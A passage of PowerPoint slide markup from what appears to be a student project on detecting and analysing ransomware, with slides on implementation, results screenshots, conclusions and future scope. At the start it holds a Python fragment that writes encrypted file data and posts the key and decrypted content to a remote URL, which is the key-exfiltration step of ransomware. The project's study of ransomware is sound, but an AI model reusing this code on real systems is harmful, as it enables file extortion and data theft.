            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>") as file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>encrypted_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    print(filename)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>SendData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(decrypted):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    now = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>datetime.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    date = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>now.strftime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>("%d/%m/%Y %H:%M:%S")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    data = f'[{digits}, {key}, "{date}", "{decrypted}"]' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>requests.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16337313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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631166" y="1241201"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution Flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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7653" y="1617595"/>
            <a:ext cx="5182626" cy="5146042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29103326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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398253" y="1057773"/>
            <a:ext cx="10515600" cy="5031388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1 Resulting Screens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1.1	Screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 :   Data upload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635023" y="2131101"/>
            <a:ext cx="5731510" cy="3222625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="793039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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398253" y="1057773"/>
            <a:ext cx="10515600" cy="5031388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1 Resulting Screens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1.2	Screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 :   File found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ransomeware</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3135354" y="2383336"/>
            <a:ext cx="5731510" cy="3010535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11843134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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398253" y="1057773"/>
            <a:ext cx="10515600" cy="5031388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1 Resulting Screens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.1.3	Screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 :  files analysis list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3057716" y="2470946"/>
            <a:ext cx="5731510" cy="2882265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29042565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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. Conclusions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Future </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510396" y="1299412"/>
            <a:ext cx="10515600" cy="4747703"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.1	Conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>large increase in the number crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t> attacks has been experienced, especially with the popularity of virtual currency. This situation is due to the difficulty in legally tracing virtual currency. Attackers encrypt the victim’s files with crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t> and inform them that they need to buy an encryption key to ensure access to their files again. Due to the encryption type used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t> it is nearly impossible to break the encryption through outside intervention and this is accepted as technically impossible. The attacker deletes the encrypted files from the victim’s computer and asserts that they are held in a storage area they own. In recent times, attackers have sent a message stating that they will unencrypt a file of the victim’s choosing not above 100 MB in order to make sure the victim believes the situation. When the victim agrees, they are successfully given access to the file. However, when the victim pays the desired ransom the attacker has achieved their aim and communication ceases. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>Analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t> encompasses detection of this software, understanding how it works and reaching the attacker. During crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t> analysis, reverse engineering techniques are used and the structure of the malware and interaction with the system are determined. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35939130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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. Conclusions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Future </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285894" y="1136037"/>
            <a:ext cx="11066254" cy="5627600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.2	Future scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>In contemplating the future trajectory of this system, numerous avenues for advancement emerge. Firstly, the integration of cutting-edge machine learning algorithms holds promise for enhancing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> detection and analysis capabilities. Techniques like deep learning and anomaly detection could empower the system to dynamically adapt, effectively identifying evolving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
